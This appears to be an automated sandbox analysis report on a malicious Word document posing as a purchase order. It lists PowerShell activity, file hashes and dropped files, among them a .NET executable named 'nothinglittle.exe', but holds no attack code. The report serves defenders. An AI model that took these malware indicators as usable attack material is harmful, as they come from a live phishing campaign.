Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Queries volume information: C:\Users\Public\Documents\nothinglittle.exe VolumeInformation	Jump to behavior

ID:	433026
Product:	CloudBasic
Start time:	07:40:29
Start date:	11.06.2021
Sample:	RFL_PO 69002.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	ee4431e2c986dcac3fc8078c674ba65e
SHA1:	64aa75122963e38f52739ba819788e4bfcfb3651
SHA256:	4219dd0fbae4f8d9e9964eac82293fefc6a7f1b75242473f6347daed349198a2
Filetype:	Microsoft Word document (32009/1) 54.23%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nothinglittle.exe.log	ASCII text, with CRLF line terminators	CC144808DBAF00E03294347EADC8E779	A3434FC71BA82B7512C813840427C687ADDB5AEA	3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\26C2BCD2-E8F6-49A5-B037-8B38394825D2	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators	7C76C23A4308BEA58E3FD506F8D83B61	413E1AFC6D4095B690532A786941A56CB76980FD	D72722CF884CB8E99725E39C9EDF3E641DF452CF65B1170822715ECFCD9D1A12
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{B54863EA-DCB1-40F2-82C0-0033BFBBA29B}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	8174136751F99393637FA90D730B6DEA	EAD0E1BCA809316BEE905A39C81A614941A69E13	33EEC1E1498A9A515B22C52CB5A038427287865D337842EE7DC6F6F3D680148B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xyghfd3f.ne3.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlxsqdho.sxz.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\nothinglittle.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	3C88C6EF1A906BC81FC6B5B7FC478E0C	1007EA59D9C209F367A1873AE6DA2EAC5FAD81EF	1754283E0B6BBBBEB69F165E54E3795D3E34CA14AA7BD8BD3B7DCDD97F7DFCA8
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RFL_PO 69002.doc.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Fri Jun 11 13:41:17 2021, atime=Fri Jun 11 13:41:14 2021, length=428544, window=hide	326DA33472BCE1E3DDFC01C7DF3E2B4A	55CDBA308D2A068035C7682BE8CB698B9C6FE9EE	61ECC0B69CCF39C58EE724609E4E94FD51718265DA3B325A37EDA0F89BABAF3F
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	FD08BA3815DD637EF453DAC8CECE58B1	C8A49EFC89DA0F191D9ADE78F87E2EBDA9FB489E	BC7C82D01FA1956ABB9DE65B449D64764AEFA4DCED9C6562E1E486EC203213B2
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	3DB29F99C92EAE09D66E7956176941F9	EFFBE8C1E324025C9D2A2A5CE33984176119E3AD	4CDF8B60D17CCF48A34A2AEEF85CDEFF523EB6703384E1A93D6CD789035786EB
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W7MKASODXYUB7NTL3O4Z.temp	data	FD8B140321A3D215CADA531B2CFAFD87	71F68840933522AF429F7C5C8659368C00A970B1	EE6A71778B66C799BEF3D410C77B7FDD41F392F7716EEAA87C7024050EFE2565
C:\Users\user\Desktop\~$L_PO 69002.doc	data	3DB29F99C92EAE09D66E7956176941F9	EFFBE8C1E324025C9D2A2A5CE33984176119E3AD	4CDF8B60D17CCF48A34A2AEEF85CDEFF523EB6703384E1A93D6CD789035786EB
C:\Users\user\Documents\20210611\PowerShell_transcript.061544._jjnsaz8.20210611074123.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	41198D89573FF81DF8946718A0BE7FFF	F2B1566B8BB857B5D146425D3005AF284B44F1A4	09ED80C09E98F4397651FD1795FC28A75A101DA9032E1212033B7E56FCA6335A